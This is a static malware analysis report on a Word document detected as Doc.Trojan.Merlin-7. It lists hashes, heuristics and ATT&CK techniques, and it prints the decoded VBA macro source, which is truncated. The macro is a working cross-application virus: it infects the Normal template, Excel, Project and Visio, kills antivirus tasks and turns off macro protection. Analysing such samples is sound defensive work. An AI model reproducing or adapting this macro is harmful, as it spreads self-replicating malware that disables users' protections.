Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ecfe6b37a904d46…

MALICIOUS

Office (OLE)

44.0 KB Created: 2003-09-06 16:37:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: a4631d2f313902bbb6cd408dad0590ef SHA-1: bc36783fdc75c9acaafccd2fd833956e4c489f85 SHA-256: 2ecfe6b37a904d46961b03115c4e9d443af479637cf4589fa01e4af511b0c515
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of Shell() and CreateObject(), common for executing arbitrary code. ClamAV identifies the file as Doc.Trojan.Merlin-7. The VBA script appears to be attempting to interact with other Office applications and potentially execute external code, though obfuscation limits a precise understanding of the second-stage payload.

Heuristics 5

  • ClamAV: Doc.Trojan.Merlin-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Merlin-7
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11218 bytes
SHA-256: a0cccf5aa903d734a85822cf43d499235e978b1d8f7b71625e9980ddba827e51
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'
visiobj = "Visio.Application": visitarget$ = "Blank Drawing.vst": getvisio = 1
t = Application: If VBA.IsObject(t) Then noobj = "1": If noobj = "1" Then GoTo itsvisio
dramamine = Application.Version
ni = 1: Exie = "Excel.Application"
te$ = t: tested = Left(te$, 5)
If tested <> "Micro" Then GoTo itsvisio
If t = "Microsoft Word" Then GoTo notproject
If t = "Microsoft Excel" Then GoTo notwordeither
If t = "Microsoft Project" Then
runningapp = 3
If dramamine = "8.0" Then
'
End If
For Each x In Projects
On Error Resume Next
runningapp = 3
Set a = x.VBProject.VBComponents(getvisio).codemodule
Set tp = ThisProject.VBProject.VBComponents(getvisio).codemodule
cntr = tp.countoflines
If a.lines(4, 1) <> "t=application" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.lines(1, cntr)
'
'
End If
Next x
Set temp = Application.VBE.VBProjects(getvisio).VBComponents(getvisio).codemodule
If temp.lines(2, 1) <> "'" Then
temp.deletelines 1, temp.countoflines
temp.insertlines 1, tp.lines(1, tp.countoflines)
End If
End If
notproject:
ni = 2
If t = "Microsoft Word" Then
On Error GoTo getthereg
Set a = ActiveDocument.VBProject.VBComponents.Item(ni - 1).codemodule
Set tp = NormalTemplate.VBProject.VBComponents.Item(ni - 1).codemodule
runningapp = 1
'
'
'
For iv = 1 To Tasks.Count
av$ = Tasks(iv).Name
mv = InStr(1, av$, "irus", vbTextCompare)
If mv > 0 Then
Tasks(iv).Close
GoTo out
End If
Next iv
out:
If tp = "" Then GoTo getthereg
If dramamine <> "10.0" Then
Options.VirusProtection = (Rnd * 0)
End If
If tp.lines(2, 1) <> "'" Then
tp.deletelines 1, tp.countoflines
tp.insertlines 1, a.lines(1, a.countoflines)

End If
If a.lines(2, 1) <> "'" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.lines(1, tp.countoflines)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If

End If
GoTo crossing
notwordeither:
'
If t = "Microsoft Excel" Then
runningapp = 2: On Error GoTo crossing
Set a = ActiveWorkbook.VBProject.VBComponents(getvisio).codemodule
Set tp = ThisWorkBook.VBProject.VBComponents(getvisio).codemodule
runningapp = 2
If a.lines(2, 1) <> "'" Then
a.deletelines 1, a.countoflines
a.insertlines 1, tp.countoflines(1, tp.countoflines)
ActiveWorkbook.SaveAs (ActiveWorkbook.FullName)
End If
End If
GoTo crossing
itsvisio:
'
runningapp = 4
Set nom = ThisDocument.VBProject.VBComponents(1).codemodule
For i = 1 To Documents.Count
Set docobj = Documents.Item(1)
Set gets = docobj.VBProject.VBComponents(1).codemodule
If gets.lines(2, 1) <> Chr(39) Then
gets.deletelines 1, gets.countoflines
gets.insertlines 1, nom.lines(1, nom.countoflines)
Documents(i).Save
End If
Next i
If noobj = "1" Then GoTo noinfw
crossing:
amd = Dir("c:\fallen.txt"): If amd <> "" Then getvisio = 2
If amd = "fallen.txt" Then GoTo getthereg
Open "c:\fallen.txt" For Output As 1: Print #1, "": Close 1
If t <> Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) Then
ra = Dir("c:\fallen.reg")
If ra = "" Then dropit = "true"
If dropit <> "true" Then GoTo nextone
On Error GoTo nextone: Set xlapp = CreateObject(Exie)
chk = Dir(xlapp.Application.StartupPath & "\Book1.xls")
If chk = "" Then
Set book1Obj = xlapp.workbooks.Add
book1Obj.VBProject.VBComponents.Item(1).codemodule.insertlines 1, a.lines(1, a.countoflines)
book1Obj.VBProject.VBComponents.Item(1).codemodule.replaceline 1, "Private Sub Workbook_Deactivate()"

book1Obj.SaveAs (xlapp.Application.StartupPath & "\Book1.xls")
book1Obj.Close
dropit = "true"
End If
xlapp.Quit
End If
nextone:
On Error GoTo novis
If tested = "Micro" And getvisio = 1 Then
Set vsapp = CreateObject(visiobj)
vsapp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.